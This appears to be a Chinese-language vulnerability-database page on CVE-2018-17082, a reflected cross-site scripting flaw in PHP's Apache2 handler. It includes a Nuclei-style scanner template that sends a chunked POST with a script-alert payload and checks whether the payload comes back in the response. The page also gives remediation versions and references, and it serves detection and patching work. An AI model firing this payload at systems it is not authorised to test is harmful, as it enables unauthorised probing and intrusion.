CVE-2018-17082: Apache2 - Transfer-Encoding Chunked XSS

日期: 2025-12-02 | 影响软件: Apache2 | POC: 已公开

漏洞描述

Apache2 PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 contain a reflected cross-site scripting vulnerability caused by mishandling of chunked transfer-encoding requests in sapi/apache2handler/sapi_apache2.c. Attackers can execute malicious scripts via crafted requests by sending a specially crafted chunked request.

PoC代码[已公开]

id: CVE-2018-17082

info:
  name: Apache2 - Transfer-Encoding Chunked XSS
  author: DhiyaneshDK
  severity: medium
  description: |
    Apache2 PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 contain a reflected cross-site scripting vulnerability caused by mishandling of chunked transfer-encoding requests in sapi/apache2handler/sapi_apache2.c. Attackers can execute malicious scripts via crafted requests by sending a specially crafted chunked request.
  impact: |
    Attackers can execute malicious scripts in the context of the affected server, leading to potential session hijacking or data theft.
  remediation: |
    Update to PHP 5.6.38, 7.0.32, 7.1.22, or 7.2.10 or later versions.
  reference:
    - https://bugs.php.net/bug.php?id=76582
    - https://github.com/php/php-src/commit/23b057742e3cf199612fa8050ae86cae675e214e
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17082
    - https://security.gentoo.org/glsa/201812-01
    - https://github.com/ockeghem/web-sec-study/blob/master/why-CVE-2018-17082-is-not-XSS/README.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-17082
    cwe-id: CWE-79
    epss-score: 0.09513
    epss-percentile: 0.9255
    cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: php
    product: php
  tags: cve,cve2018,php,apache,xss,chunked

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked

        <script>alert(document.domain)</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Bad Request<script>alert(document.domain)</script>"

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 400
# digest: 490a0046304402206b82ca5d9aac41b970d4adfd8bf6d073e4a444c8f3f425f6f72f59823245b6ef02203266d11cd7a3bcb527e72fe15ee4e6f2d5eef5760f428e142110e9c0d85b9ce6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐